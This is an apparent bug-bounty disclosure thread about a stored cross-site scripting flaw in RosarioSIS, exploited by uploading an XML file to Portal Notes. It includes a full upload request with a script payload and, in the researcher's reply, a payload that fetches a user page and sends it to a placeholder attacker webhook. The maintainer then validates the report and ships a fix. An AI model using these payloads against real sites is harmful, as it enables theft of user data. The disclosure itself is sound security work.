Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022


Description

When user upload file with XML extension in white-list, server will stored XML file at assets/PortalNotesFiles/, so we can direct access and execute javascript code.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png

<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC images

image image

Impact

This vulnerability can be arbitrarily executed javascript code, steal user'cookie, etc...

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Nhien.IT
a year ago

Researcher


Hi @admin, can you contact with maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back a year ago
Jamie Slome
a year ago

Admin


@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above ­čĹŹ

Let me know if you have any further questions.

Fran├žois
a year ago

Maintainer


Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

Fran├žois
a year ago

Maintainer


Oh, cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT
a year ago

Researcher


Hello @maintainer,

Because XML file upload in your website, so with same origin policy, so javascript code in the malicous XML allow fetch other user information and send to attacker's host, sometime this vulnerability allow attacker perform HTTP request in victim browser.

Sample payload

<html>
    <head></head>
    <body>
        <info>
          <name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC

image

Fran├žois Jacquet validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Fran├žois Jacquet marked this as fixed in 8.9.5 with commit 90842c a year ago
Fran├žois Jacquet has been awarded the fix bounty
This vulnerability will not receive a CVE
FileUpload.fnc.php#L842 has been validated
to join this conversation